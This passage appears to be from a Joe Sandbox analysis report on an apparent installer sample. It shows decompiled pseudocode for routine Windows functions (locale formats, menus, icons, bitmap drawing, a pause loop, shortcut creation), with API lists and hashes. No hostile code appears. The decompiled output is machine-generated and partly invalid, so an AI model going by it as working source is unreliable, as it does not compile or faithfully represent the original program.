Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

7677B690.OLE32(0048C778,00000000,00000001,0048C788,?,00000000,00454A2E), ref: 00454898
SysFreeString.OLEAUT32(00000000), ref: 004549F3

Strings

IShellLink::QueryInterface, xrefs: 0045496B
IPersistFile::Save, xrefs: 004549C5
CoCreateInstance, xrefs: 004548A3

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: 7677B690String$AllocByteCharFreeMultiWide
String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
API String ID: 2378425-615220198
Opcode ID: 9423e9b337cee8fbe4770dca87892ebb5335933748168407e0bbfd7638a1954a
Instruction ID: 04063d8438c49896bf8ff3378263cd16c234eebe7b4a91fe488d377965e86307
Opcode Fuzzy Hash: 9423e9b337cee8fbe4770dca87892ebb5335933748168407e0bbfd7638a1954a
Instruction Fuzzy Hash: 1F514071640105AFDB40EFA9C885F9E77F8AF49309F014066F914EB292DB78DD88CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00408904 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00408904(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x408b4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E0040874C(_t31, 0, 0x14,  &_v16);
				E00403598(0x48d498, _t104, _v16, __edi, __esi);
				E0040874C(_t104, 0x408b64, 0x1b,  &_v16);
				 *0x48d49c = E00406E70(0x408b64, 0);
				E0040874C(_t104, 0x408b64, 0x1c,  &_v16);
				 *0x48d49d = E00406E70(0x408b64, 0);
				 *0x48d49e = E00408798(_t104, 0x2c, 0xf);
				 *0x48d49f = E00408798(_t104, 0x2e, 0xe);
				E0040874C(_t104, 0x408b64, 0x19,  &_v16);
				 *0x48d4a0 = E00406E70(0x408b64, 0);
				 *0x48d4a1 = E00408798(_t104, 0x2f, 0x1d);
				E0040874C(_t104, "m/d/yy", 0x1f,  &_v16);
				E00403598(0x48d4a4, _t104, _v16, _t152, _t153);
				E0040874C(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E00403598(0x48d4a8, _t104, _v16, _t152, _t153);
				 *0x48d4ac = E00408798(_t104, 0x3a, 0x1e);
				E0040874C(_t104, 0x408b98, 0x28,  &_v16);
				E00403598(0x48d4b0, _t104, _v16, _t152, _t153);
				E0040874C(_t104, 0x408ba4, 0x29,  &_v16);
				E00403598(0x48d4b4, _t104, _v16, _t152, _t153);
				E0040874C(_t104, 0x408b64, 0x25,  &_v16);
				if(E00406E70(0x408b64, 0) != 0) {
					E004035DC( &_v8, 0x408bbc);
				} else {
					E004035DC( &_v8, 0x408bb0);
				}
				E0040874C(_t104, 0x408b64, 0x23,  &_v16);
				if(E00406E70(0x408b64, 0) != 0) {
					E00403548( &_v12);
				} else {
					E004035DC( &_v12, 0x408bc8);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E0040377C();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E0040377C();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E00408B53);
				return E00403568( &_v16, 3);
			}

0x00408904
0x00408904
0x00408907
0x00408909
0x0040890b
0x0040890e
0x0040890f
0x00408912
0x00408913
0x00408918
0x0040891b
0x00408923
0x00408932
0x0040893f
0x00408954
0x00408963
0x00408978
0x00408987
0x0040899a
0x004089ad
0x004089c2
0x004089d1
0x004089e4
0x004089f9
0x00408a06
0x00408a1b
0x00408a28
0x00408a3b
0x00408a50
0x00408a5d
0x00408a72
0x00408a7f
0x00408a94
0x00408aa5
0x00408abe
0x00408aa7
0x00408aaf
0x00408aaf
0x00408ad3
0x00408ae4
0x00408af8
0x00408ae6
0x00408aee
0x00408aee
0x00408afd
0x00408b00
0x00408b05
0x00408b12
0x00408b17
0x00408b1a
0x00408b1f
0x00408b2c
0x00408b33
0x00408b36
0x00408b39
0x00408b4b

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408B4C,?,?,?,?,00000000,00000000,00000000,?,00409B93,00000000,00409BA6), ref: 0040891E

Part of subcall function 0040874C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,00408817,?,00000000,004088F6), ref: 0040876A

Part of subcall function 00408798: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040899A,?,?,?,00000000,00408B4C), ref: 004087AB

Strings

mmmm d, yyyy, xrefs: 00408A0F
:mm, xrefs: 00408B00
m/d/yy, xrefs: 004089ED
:mm:ss, xrefs: 00408B1A
AMPM, xrefs: 00408AE9

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 81a932f8153ae78f5a34053263b439ba7e7a26f4bb25af516e14527f0454616a
Instruction ID: cbac9e27da11d265a24ee1a403533bf6af8fcf46891778997080b57a8c7b220e
Opcode Fuzzy Hash: 81a932f8153ae78f5a34053263b439ba7e7a26f4bb25af516e14527f0454616a
Instruction Fuzzy Hash: 5B514C64B01208ABD701EBA5CD41A8E77AADB89704F20D47FB141BB3D6CE3CEA05875C

Uniqueness

Uniqueness Score: -1.00%

Function 0041190C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041190C(void* __eax, void* __ebx, struct HMENU__* __edx, void* __edi, intOrPtr __esi) {
				char _v8;
				struct tagMENUITEMINFOA _v52;
				char _v56;
				intOrPtr _t91;
				CHAR* _t97;
				short _t128;
				void* _t132;
				intOrPtr _t139;
				struct HMENU__* _t159;
				int _t163;
				void* _t167;
				void* _t171;

				_t160 = __esi;
				_push(__esi);
				_push(__edi);
				_v56 = 0;
				_v8 = 0;
				_t159 = __edx;
				_t132 = __eax;
				_push(_t167);
				_push(0x411b11);
				_push( *[fs:eax]);
				 *[fs:eax] = _t167 + 0xffffffcc;
				if( *((char*)(__eax + 0x2c)) == 0) {
					L15:
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E00411B18);
					E00403548( &_v56);
					return E00403548( &_v8);
				}
				E004035DC( &_v8,  *((intOrPtr*)(__eax + 0x20)));
				if(E00411EB4(_t132) <= 0) {
					__eflags =  *((short*)(_t132 + 0x40));
					if( *((short*)(_t132 + 0x40)) == 0) {
						L8:
						_t171 = (GetVersion() & 0x000000ff) - 4;
						if(_t171 < 0) {
							_t163 =  *(0x48c298 + ((E004037CC( *((intOrPtr*)(_t132 + 0x20)), E00411B34) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0048C28C |  *0x0048C27C |  *0x0048C284 | 0x00000400;
							_t91 = E00411EB4(_t132);
							__eflags = _t91;
							if(_t91 <= 0) {
								InsertMenuA(_t159, 0xffffffff, _t163,  *(_t132 + 0x30) & 0x0000ffff, E00403880(_v8));
							} else {
								_t97 = E00403880( *((intOrPtr*)(_t132 + 0x20)));
								InsertMenuA(_t159, 0xffffffff, _t163 | 0x00000010, E00411CC4(_t132, _t159, _t163), _t97);
							}
						} else {
							_v52.cbSize = 0x2c;
							_v52.fMask = 0x3f;
							_v52.fType =  *(0x48c2cc + ((E004037CC( *((intOrPtr*)(_t132 + 0x20)), E00411B34) & 0xffffff00 | _t171 == 0x00000000) & 0x0000007f) * 4) |  *0x0048C2C4 |  *0x0048C2A0;
							_v52.fState =  *0x0048C2AC |  *0x0048C2BC |  *0x0048C2B4;
							_v52.wID =  *(_t132 + 0x30) & 0x0000ffff;
							_v52.hSubMenu = 0;
							_v52.hbmpChecked = 0;
							_v52.hbmpUnchecked = 0;
							_v52.dwTypeData = E00403880(_v8);
							if(E00411EB4(_t132) > 0) {
								_v52.hSubMenu = E00411CC4(_t132, _t159, _t160);
							}
							InsertMenuItemA(_t159, 0xffffffff, 1,  &_v52);
						}
						goto L15;
					}
					_t160 =  *((intOrPtr*)(_t132 + 0x44));
					__eflags = _t160;
					if(_t160 == 0) {
						L7:
						_push(_v8);
						_push(0x411b28);
						E004112F0( *((intOrPtr*)(_t132 + 0x40)), _t132, 0,  &_v56, _t159, _t160);
						_push(_v56);
						E0040377C();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t160 + 0x44));
					if( *((intOrPtr*)(_t160 + 0x44)) != 0) {
						goto L7;
					}
					_t128 = E00402CE8( *((intOrPtr*)(_t160 + 4)), 0x410fe0);
					__eflags = _t128;
					if(_t128 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v52.hSubMenu = E00411CC4(_t132, _t159, __esi);
				goto L8;
			}

0x0041190c
0x00411913
0x00411914
0x00411917
0x0041191a
0x0041191d
0x0041191f
0x00411923
0x00411924
0x00411929
0x0041192c
0x00411933
0x00411af3
0x00411af5
0x00411af8
0x00411afb
0x00411b03
0x00411b10
0x00411b10
0x0041193f
0x0041194d
0x0041195b
0x00411960
0x004119a4
0x004119ad
0x004119b1
0x00411aac
0x00411ab4
0x00411ab9
0x00411abb
0x00411aee
0x00411abd
0x00411ac0
0x00411ad5
0x00411ad5
0x004119b7
0x004119b7
0x004119be
0x004119f9
0x00411a20
0x00411a27
0x00411a2c
0x00411a31
0x00411a36
0x00411a41
0x00411a4d
0x00411a56
0x00411a56
0x00411a62
0x00411a62
0x00000000
0x004119b1
0x00411962
0x00411965
0x00411967
0x00411980
0x00411980
0x00411983
0x0041198f
0x00411994
0x0041199f
0x00000000
0x0041199f
0x00411969
0x0041196d
0x00000000
0x00000000
0x00411977
0x0041197c
0x0041197e
0x00000000
0x00000000
0x00000000
0x0041197e
0x00411956
0x00000000

APIs

GetVersion.KERNEL32(00000000,00411B11), ref: 004119A4
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411A62

Part of subcall function 00411CC4: CreatePopupMenu.USER32(?,00411ACD,00000000,00000000,00411B11), ref: 00411CDE

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411AEE

Part of subcall function 00411CC4: CreateMenu.USER32(?,00411ACD,00000000,00000000,00411B11), ref: 00411CE8

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411AD5

Strings

?, xrefs: 004119BE
,, xrefs: 004119B7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 4c528fa5d3995bc83990e5b19509b77ea988bb30a46fc0ac49d423383eccc090
Instruction ID: aacaa9dd046c779e90f1b5d76a723ea90a978e87e1adf0d0b51d2de3d13b441c
Opcode Fuzzy Hash: 4c528fa5d3995bc83990e5b19509b77ea988bb30a46fc0ac49d423383eccc090
Instruction Fuzzy Hash: 55512570A101419BDB00EF7ADC816EE7BF5AF09304B1545BAF944E73A6D738D941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C07B Relevance: 10.7, APIs: 7, Instructions: 153
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041C07B(signed int __ebx, void* __edi) {
				struct HINSTANCE__* _t118;
				signed int _t125;
				signed int _t127;
				long _t132;
				void* _t134;
				void* _t140;
				intOrPtr _t150;
				signed int _t154;
				void* _t158;
				BYTE* _t159;
				BYTE* _t162;
				signed int _t164;
				void* _t166;
				intOrPtr _t167;

				_t158 = __edi;
				_t127 = __ebx | 0xffffffff;
				 *(_t166 - 0x20) = 0;
				_t134 =  *((intOrPtr*)(_t166 - 0xc)) - 1;
				if(_t134 < 0) {
					L10:
					if(_t127 == 0xffffffff) {
						_t127 = 0;
					}
					 *((intOrPtr*)(_t166 - 0x44)) =  *((intOrPtr*)(_t166 - 0x10)) + (_t127 + _t127) * 8;
					 *((intOrPtr*)(_t166 - 0x30)) = E00406A40( *((intOrPtr*)( *((intOrPtr*)(_t166 - 0x44)) + 8)),  *((intOrPtr*)(_t166 - 0x10)), _t158, 0);
					 *[fs:eax] = _t167;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))) + 8))( *[fs:eax], 0x41c230, _t166);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4))))))();
					E0041BDD0( *((intOrPtr*)(_t166 - 0x30)),  *((intOrPtr*)(_t166 - 0x30)), _t166 - 0x3c, _t166 - 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))), 0);
					GetObjectA( *(_t166 - 0x3c), 0x18, _t166 - 0x74);
					GetObjectA( *(_t166 - 0x38), 0x18, _t166 - 0x5c);
					_t132 =  *(_t166 - 0x68) *  *(_t166 - 0x6c) * ( *(_t166 - 0x64) & 0x0000ffff);
					 *(_t166 - 0x40) =  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff);
					 *((intOrPtr*)(_t166 - 0x18)) =  *(_t166 - 0x40) + _t132;
					 *(_t166 - 0x34) = E00406A40( *((intOrPtr*)(_t166 - 0x18)),  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff) >> 0x20, _t158, 0);
					_push(_t166);
					_push(0x41c20d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t167;
					_t159 =  *(_t166 - 0x34);
					_t162 =  &(( *(_t166 - 0x34))[_t132]);
					GetBitmapBits( *(_t166 - 0x3c), _t132, _t159);
					GetBitmapBits( *(_t166 - 0x38),  *(_t166 - 0x40), _t162);
					DeleteObject( *(_t166 - 0x38));
					DeleteObject( *(_t166 - 0x3c));
					_t118 =  *0x48d014; // 0x400000
					 *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) = CreateIcon(_t118,  *(_t166 - 0x28),  *(_t166 - 0x24),  *(_t166 - 0x4c),  *(_t166 - 0x4a), _t159, _t162);
					if( *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) == 0) {
						E0041B5AC();
					}
					_pop(_t150);
					 *[fs:eax] = _t150;
					_push(E0041C214);
					return E00402668( *(_t166 - 0x34));
				} else {
					_t140 = _t134 + 1;
					_t125 = 0;
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
						_t164 =  *(_t166 - 0x1a) & 0x0000ffff;
						if(_t154 == _t164) {
							break;
						}
						__eflags = _t127 - 0xffffffff;
						if(_t127 != 0xffffffff) {
							__eflags = _t154 -  *(_t166 - 0x20);
							if(_t154 >  *(_t166 - 0x20)) {
								_t127 = _t125;
							}
						} else {
							__eflags = _t164 - _t154;
							if(_t164 >= _t154) {
								_t127 = _t125;
								 *(_t166 - 0x20) =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
							}
						}
						_t125 = _t125 + 1;
						_t140 = _t140 - 1;
						__eflags = _t140;
						if(__eflags != 0) {
							continue;
						} else {
							goto L10;
						}
					}
					_t127 = _t125;
					goto L10;
				}
			}

0x0041c07b
0x0041c07b
0x0041c080
0x0041c086
0x0041c089
0x0041c0cd
0x0041c0d0
0x0041c0d2
0x0041c0d2
0x0041c0de
0x0041c0ec
0x0041c0fa
0x0041c114
0x0041c127
0x0041c131
0x0041c140
0x0041c14f
0x0041c15f
0x0041c16e
0x0041c176
0x0041c181
0x0041c186
0x0041c187
0x0041c18c
0x0041c18f
0x0041c192
0x0041c198
0x0041c1a0
0x0041c1ae
0x0041c1b7
0x0041c1c0
0x0041c1d7
0x0041c1e5
0x0041c1ed
0x0041c1ef
0x0041c1ef
0x0041c1f6
0x0041c1f9
0x0041c1fc
0x0041c20c
0x0041c08b
0x0041c08b
0x0041c08c
0x0041c08e
0x0041c095
0x0041c09a
0x0041c0a0
0x00000000
0x00000000
0x0041c0a6
0x0041c0a9
0x0041c0c2
0x0041c0c5
0x0041c0c7
0x0041c0c7
0x0041c0ab
0x0041c0ab
0x0041c0ad
0x0041c0af
0x0041c0bd
0x0041c0bd
0x0041c0ad
0x0041c0c9
0x0041c0ca
0x0041c0ca
0x0041c0cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c0cb
0x0041c0a2
0x00000000
0x0041c0a2

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041C140
GetObjectA.GDI32(?,00000018,?), ref: 0041C14F
GetBitmapBits.GDI32(?,?,?), ref: 0041C1A0
GetBitmapBits.GDI32(?,?,?), ref: 0041C1AE
DeleteObject.GDI32(?), ref: 0041C1B7
DeleteObject.GDI32(?), ref: 0041C1C0
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041C1DD

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: d71df9ace4eddb9baf3b419d90bf13da6b4e5c141a6084b6b587c595bafac23f
Instruction ID: 02dbd23564bc868c77259816639de4d0103f2e0eef331e1f8476ff1c772e8b14
Opcode Fuzzy Hash: d71df9ace4eddb9baf3b419d90bf13da6b4e5c141a6084b6b587c595bafac23f
Instruction Fuzzy Hash: 9E510831E00219AFCB10DFE9C8819EEBBF9EF4C314B118566F514E7291D638AD81CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041D0F0 Relevance: 10.7, APIs: 7, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0041D0F0(void* __eax, void* __ebx, int* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v13;
				char _v14;
				signed char _t57;
				char _t58;
				intOrPtr _t64;
				struct HDC__* _t72;
				void* _t74;
				void* _t81;
				struct HDC__* _t93;
				void* _t106;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t127;
				int* _t129;
				void* _t131;
				void* _t132;
				intOrPtr _t133;

				_t107 = __ecx;
				_t131 = _t132;
				_t133 = _t132 + 0xfffffff4;
				_t129 = __ecx;
				_v8 = __edx;
				_t106 = __eax;
				if(E0041D354(__eax) == 0) {
					SetStretchBltMode(E0041B2AC(_v8), 3);
				}
				if( *((intOrPtr*)(_t106 + 0x14)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 0xc)) == 0) {
					_push(0x26);
					_t57 = E0041B2AC(_v8);
					_push(_t57);
					L00405D64();
					if((_t57 & 0x00000020) == 0 ||  *((char*)( *((intOrPtr*)(_t106 + 0x10)) + 0x25)) != 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 8)) == 0 || E0040CE54( *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 8))) == 0) {
						goto L9;
					} else {
						_t58 = 0;
					}
				} else {
					L9:
					_t58 = 1;
				}
				_v13 = _t58;
				_t127 =  *((intOrPtr*)(_t106 + 0x10));
				_t122 =  *0x41d28c; // 0xf
				E0041B380(_v8, _t107, _t122, _t127);
				E0041D470(_t106);
				_v12 = 0;
				_v14 = 0;
				_t64 =  *((intOrPtr*)(_t127 + 0x10));
				if(_t64 != 0) {
					_push(1);
					_push(_t64);
					_t93 =  *(_v8 + 4);
					_push(_t93);
					L00405E34();
					_v12 = _t93;
					_push( *(_v8 + 4));
					L00405DF4();
					_v14 = 1;
				}
				_push(_t131);
				_push(0x41d27d);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t133;
				if(_v13 == 0) {
					StretchDIBits( *(_v8 + 4),  *_t129, _t129[1], _t129[2] -  *_t129, _t129[3] - _t129[1], 0, 0,  *(_t127 + 0x14),  *(_t127 + 0x18),  *(_t127 + 0x20),  *(_t127 + 0x1c), 0,  *(_v8 + 0x20));
				} else {
					_t74 = E0041D2E8(_t106, 0, _t122);
					_t125 =  *0x41d28c; // 0xf
					E0041B380(_t74, 0, _t125, _t127);
					_t81 = E0041D2E8(_t106, 0, _t125);
					StretchBlt(E0041B2AC(_v8),  *_t129, _t129[1], _t129[2] -  *_t129, _t129[3] - _t129[1],  *(_t81 + 4), 0, 0,  *(_t127 + 0x14),  *(_t127 + 0x18),  *(_v8 + 0x20));
				}
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(0x41d284);
				if(_v14 != 0) {
					_push(1);
					_push(_v12);
					_t72 =  *(_v8 + 4);
					_push(_t72);
					L00405E34();
					return _t72;
				}
				return 0;
			}

0x0041d0f0
0x0041d0f1
0x0041d0f3
0x0041d0f9
0x0041d0fb
0x0041d0fe
0x0041d109
0x0041d116
0x0041d116
0x0041d11f
0x0041d12a
0x0041d12f
0x0041d134
0x0041d135
0x0041d13d
0x00000000
0x0041d160
0x0041d160
0x0041d160
0x0041d164
0x0041d164
0x0041d164
0x0041d164
0x0041d166
0x0041d169
0x0041d16c
0x0041d175
0x0041d17c
0x0041d183
0x0041d186
0x0041d18a
0x0041d18f
0x0041d191
0x0041d193
0x0041d197
0x0041d19a
0x0041d19b
0x0041d1a0
0x0041d1a9
0x0041d1aa
0x0041d1af
0x0041d1af
0x0041d1b5
0x0041d1b6
0x0041d1bb
0x0041d1be
0x0041d1c5
0x0041d252
0x0041d1c7
0x0041d1c9
0x0041d1ce
0x0041d1d4
0x0041d1ee
0x0041d214
0x0041d214
0x0041d259
0x0041d25c
0x0041d25f
0x0041d268
0x0041d26a
0x0041d26f
0x0041d273
0x0041d276
0x0041d277
0x00000000
0x0041d277
0x0041d27c

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041D116
740BAD70.GDI32(00000000,00000026), ref: 0041D135
740BB410.GDI32(?,?,00000001,00000000,00000026), ref: 0041D19B
740BB150.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041D1AA
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D214
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D252
740BB410.GDI32(?,?,00000001,0041D284,00000000,00000026), ref: 0041D277

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Stretch$B410$B150BitsMode
String ID:
API String ID: 1142175050-0
Opcode ID: 0912aa83fcdfddc4ca32c9b36316faf0c7bad1d69cf94c64c911b9220a6f9b93
Instruction ID: 8ee0e88fe0eb6103f32c4df9f9e286ece57053aa0174f606738c3e696012538d
Opcode Fuzzy Hash: 0912aa83fcdfddc4ca32c9b36316faf0c7bad1d69cf94c64c911b9220a6f9b93
Instruction Fuzzy Hash: F7512FB0A00604AFDB14DFA9C985F9BB7F8EF08304F148599B559D7292C778ED80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00454F0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00454F0C(int __eax, void* __ebx, long __ecx, char __edx, void* __edi, void* __esi, char* _a4) {
				char _v5;
				char _v6;
				char _v12;
				intOrPtr _v16;
				struct tagMSG _v44;
				char _v48;
				struct HWND__* _t31;
				intOrPtr _t33;
				intOrPtr _t42;
				void* _t46;
				char _t47;
				intOrPtr _t51;
				char* _t61;
				intOrPtr _t68;
				intOrPtr _t73;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v48 = 0;
				_v12 = 0;
				_t78 = __ecx;
				_v5 = __edx;
				_t76 = __eax;
				_t61 = _a4;
				_push(_t80);
				_push(0x455076);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_v6 = 0;
				 *_t61 = 0;
				if( *0x48deec == 0) {
					L10:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(0x45507d);
					E00403548( &_v48);
					return E00403548( &_v12);
				} else {
					 *0x48df00 = 0;
					_t31 =  *0x48def8; // 0x0
					if(SendMessageA(_t31, __eax, 0, __ecx) == 0) {
						goto L10;
					} else {
						_v6 = 1;
						_t33 =  *0x48d628; // 0x21d2410
						E00424494(_t33,  &_v12);
						_v16 = E0041F0BC(0, _t61, _t76, _t78);
						_push(_t80);
						_push(0x455024);
						_push( *[fs:eax]);
						 *[fs:eax] = _t82;
						E004035DC( &_v48, "[Paused] ");
						E004036C4( &_v48, _v12);
						_t42 =  *0x48d628; // 0x21d2410
						E004244DC(_t42, _v48, _t76);
						while( *0x48df00 == 0) {
							_t46 = GetMessageA( &_v44, 0, 0, 0) - 0xffffffff;
							if(_t46 != 0) {
								if(_t46 == 1) {
									PostQuitMessage(_v44.wParam);
								} else {
									TranslateMessage( &_v44);
									DispatchMessageA( &_v44);
									continue;
								}
							}
							break;
						}
						_t47 =  *0x48df01; // 0x0
						 *_t61 = _t47;
						_pop(_t73);
						 *[fs:eax] = _t73;
						_push(0x45502b);
						E0041F170(_v16);
						_t51 =  *0x48d628; // 0x21d2410
						return E004244DC(_t51, _v12, _t76);
					}
				}
			}

0x00454f0d
0x00454f0f
0x00454f12
0x00454f13
0x00454f14
0x00454f17
0x00454f1a
0x00454f1d
0x00454f1f
0x00454f22
0x00454f24
0x00454f29
0x00454f2a
0x00454f2f
0x00454f32
0x00454f35
0x00454f39
0x00454f43
0x00455058
0x0045505a
0x0045505d
0x00455060
0x00455068
0x00455075
0x00454f49
0x00454f49
0x00454f58
0x00454f65
0x00000000
0x00454f6b
0x00454f6b
0x00454f72
0x00454f77
0x00454f83
0x00454f88
0x00454f89
0x00454f8e
0x00454f91
0x00454f9c
0x00454fa7
0x00454faf
0x00454fb4
0x00454ff1
0x00454fca
0x00454fcd
0x00454fd0
0x00454fd8
0x00454fd2
0x00454fe3
0x00454fec
0x00000000
0x00454fec
0x00454fd0
0x00000000
0x00454fcd
0x00454ffa
0x00454fff
0x00455003
0x00455006
0x00455009
0x00455011
0x00455019
0x00455023
0x00455023
0x00454f65

APIs

SendMessageA.USER32 ref: 00454F5E

Part of subcall function 00424494: GetWindowTextA.USER32 ref: 004244B4

Part of subcall function 0041F0BC: GetCurrentThreadId.KERNEL32 ref: 0041F10B
Part of subcall function 0041F0BC: 740BAC10.USER32(00000000,0041F06C,00000000,00000000,0041F128,?,00000000,0041F15F,?,00000000,00000000,021D2410), ref: 0041F111

Part of subcall function 004244DC: SetWindowTextA.USER32(?,00000000), ref: 004244F4

GetMessageA.USER32 ref: 00454FC5
TranslateMessage.USER32(?), ref: 00454FE3
DispatchMessageA.USER32 ref: 00454FEC

Strings

[Paused] , xrefs: 00454F94

Memory Dump Source

